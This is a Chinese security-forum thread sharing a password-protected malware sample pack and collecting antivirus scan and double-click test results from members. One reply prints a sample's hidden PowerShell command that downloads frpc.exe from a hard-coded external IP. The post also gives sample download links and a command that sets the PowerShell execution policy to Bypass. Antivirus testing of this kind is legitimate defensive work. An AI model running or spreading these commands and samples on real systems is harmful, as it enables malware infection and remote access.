查看: 1550|回复: 29
收起左侧

[病毒样本] 【开放测试】卡饭病毒样本包 20241110 第188期

  [复制链接]
zhuzhu009
发表于 2024-11-10 12:06:29 | 显示全部楼层 |阅读模式
本帖最后由 QVM360 于 2024-11-11 00:20 编辑

警告:
       本主题帖中所包含的任何文件和附件都有危害你的计算机的可能,并且没有安全软件可以100%防护这些样本。样本仅供测试、交流和学习,禁止用于任何非法用途。
       请在虚拟机中测试样本。对于下载样本、附件以及点击链接所导致的任何数据泄露、破坏,以及所产生的任何损失,本人和卡饭论坛不负任何责任。


样本下载:  https://x.ws28.cn/f/fj9bn0dvsrx https://wwzq.lanzouq.com/iEsxB2epfutg  https://pan.huang1111.cn/s/oXwBYs8https://homeserver.iepose.cn/download/7CD7FDAEAABF2A8F678017F8D695DBA8A829D1D26503C10923E8768BC96E9162.zip



sha256:7CD7FDAEAABF2A8F678017F8D695DBA8A829D1D26503C10923E8768BC96E9162



压缩包密码:infected

如果样本中包含.ps1文件(Powershell脚本),则需要手动打开cmd.exe输入以下指令允许运行ps1脚本:

Powershell.exe Set-ExecutionPolicy Bypass

奖励/惩罚规则:
正式测试期间的奖励规则:
1、参加完整扫描测试,+5经验
2、上传相关截图(不再需要提供扫描日志),+5经验。
3、上传双击结果(必须带图或日志),+10~30经验。
4、测试多款安全软件的,奖励累加。

惩罚规则:
1、占楼后2小时内未能给出测试结果的,视为灌水,按照论坛规定处理
2、其他违规行为,按照论坛相关规定处理。

注意:扫描/双击日志请以附件形式(压缩包)或图片上传,也可以 以1号字体在回复中。         
          对于日志过长以至于影响会员刷帖/回帖体验的回复,管理人员有权进行屏蔽处理。
当前测试阶段:开放测试

评分

参与人数 1经验 +30 收起 理由
QVM360 + 30 版区有你更精彩: )

查看全部评分

全身发抖
发表于 2024-11-10 12:35:25 | 显示全部楼层
本帖最后由 全身发抖 于 2024-11-10 13:29 编辑

自制 17/27
卡巴  22/27
双击b31cb略.bat 无法运行
b4abf略.exe 卡巴杀
8e08e略.msi 卡巴杀
0d654略.msi 卡巴杀
d37a7略.bat 卡巴拦截下载



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 2经验 +25 人气 +1 收起 理由
tony099 + 1 很给力!
QVM360 + 25 版区有你更精彩: )

查看全部评分

lovehhsw
发表于 2024-11-10 12:40:08 来自手机 | 显示全部楼层
本帖最后由 lovehhsw 于 2024-11-10 12:51 编辑

奇安信天守


360

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +20 收起 理由
QVM360 + 20 版区有你更精彩: )

查看全部评分

Fadouse
发表于 2024-11-10 12:45:45 | 显示全部楼层
本帖最后由 Fadouse 于 2024-11-10 13:00 编辑

DI + S1 23/27
静态 22x


静态 Miss 5x


双击 d37a78095312ca41053fc3e723a2378007527002b4be07da60e87fa4fbbe0036.bat ->
Powershell执行
  1. powershell.exe  -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadFile('http://101.133.156.69:7777/frpc.exe', "$env:USERPROFILE\Downloads\frpc.exe")"
复制代码
DI Kil 衍生物


双击 b31cb4790de4804d7320c1f9bbfb1ce2dd4017432ad1c216397dbb452b58dc05.bat -> 崩溃自退


双击 b4abf31b5103244cb31fbbb13521c8905abef90b1e018bd366fe42626cebd6f9.exe -> 运行一段时间后外联,下载 djIXRB.exe 后崩溃自退

双击 8e08e826c7105e2ae3a77422072ffc1e12c085db02949329f5379c5b4b24bd40.msi -> Sandboxie问题,自退

双击 0d654e474a7339c9624011011ec6549a153b765acaede2b79c14bac3e2e85a57.msi -> Snadboxie问题,自退





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +35 收起 理由
QVM360 + 35 版区有你更精彩: )

查看全部评分

Loyisa
发表于 2024-11-10 12:47:45 | 显示全部楼层
本帖最后由 Loyisa 于 2024-11-10 13:51 编辑

SEP 21X

剩余6x


双击3x
共计24x
0d654e474a7339c9624011011ec6549a153b765acaede2b79c14bac3e2e85a57.msi
miss
8ad3cd125e6243ed5f018d75a39007f542880582db374aefbea96e27088477a1.lnk
miss
b4abf31b5103244cb31fbbb13521c8905abef90b1e018bd366fe42626cebd6f9.exe
kill 衍生物

b31cb4790de4804d7320c1f9bbfb1ce2dd4017432ad1c216397dbb452b58dc05.bat
miss
d37a78095312ca41053fc3e723a2378007527002b4be07da60e87fa4fbbe0036.bat
IPS

eac0fc1901075a05e87655aac968b3b8595c771747340ad4cc79d4b0f3acdddb.hta

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +30 收起 理由
QVM360 + 30 版区有你更精彩: )

查看全部评分

biue
发表于 2024-11-10 13:07:29 | 显示全部楼层
本帖最后由 biue 于 2024-11-10 13:08 编辑

腾讯电脑管家 27X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +10 收起 理由
QVM360 + 10 版区有你更精彩: )

查看全部评分

Raven95676
发表于 2024-11-10 13:07:41 | 显示全部楼层
本帖最后由 Raven95676 于 2024-11-10 14:10 编辑

Avria

总结:miss 3x
2x未计入

扫描20x



双击:
0d654e474a7339c9624011011ec6549a153b765acaede2b79c14bac3e2e85a57.msi miss

8e08e826c7105e2ae3a77422072ffc1e12c085db02949329f5379c5b4b24bd40.msi miss
Avira似了

b4abf31b5103244cb31fbbb13521c8905abef90b1e018bd366fe42626cebd6f9.exe miss

76e537de6a1d4f58f4ae3a6b74939ee42e86ab26e88a405bb43d7fa9f5adc92d.hta 无法运行
de2bd3a7db0809c713e38c810f4f8f88d5f226e6ff8add272d432b913ff6911a.hta 无法运行


b31cb4790de4804d7320c1f9bbfb1ce2dd4017432ad1c216397dbb452b58dc05.bat


d37a78095312ca41053fc3e723a2378007527002b4be07da60e87fa4fbbe0036.bat


Elastic

总结:miss 2x + 0.5x

0d654e474a7339c9624011011ec6549a153b765acaede2b79c14bac3e2e85a57.msi miss 0.5x
一直弹Shellcode Injection


33e186a73110c8e1200d615ee10d3d5bb044074d83e2ed6ff6bd44d56bcc00f8.xlsx miss


b31cb4790de4804d7320c1f9bbfb1ce2dd4017432ad1c216397dbb452b58dc05.bat miss

8ad3cd125e6243ed5f018d75a39007f542880582db374aefbea96e27088477a1.lnk


b4abf31b5103244cb31fbbb13521c8905abef90b1e018bd366fe42626cebd6f9.exe


d37a78095312ca41053fc3e723a2378007527002b4be07da60e87fa4fbbe0036.bat


所有hta


其余均为Malware Alert

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +60 收起 理由
QVM360 + 60 版区有你更精彩: )

查看全部评分

ninjagaocc
发表于 2024-11-10 13:22:29 | 显示全部楼层
本帖最后由 ninjagaocc 于 2024-11-10 13:40 编辑

瑞星V17
第三次使用右键扫描的时候,瑞星直接卡死
剩余8x


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +25 收起 理由
QVM360 + 25 版区有你更精彩: )

查看全部评分

netweb
发表于 2024-11-10 13:29:15 | 显示全部楼层
本帖最后由 netweb 于 2024-11-10 13:39 编辑

eset

kill 24x miss 3x



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +10 收起 理由
QVM360 + 10 版区有你更精彩: )

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-30 20:38 , Processed in 0.140842 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表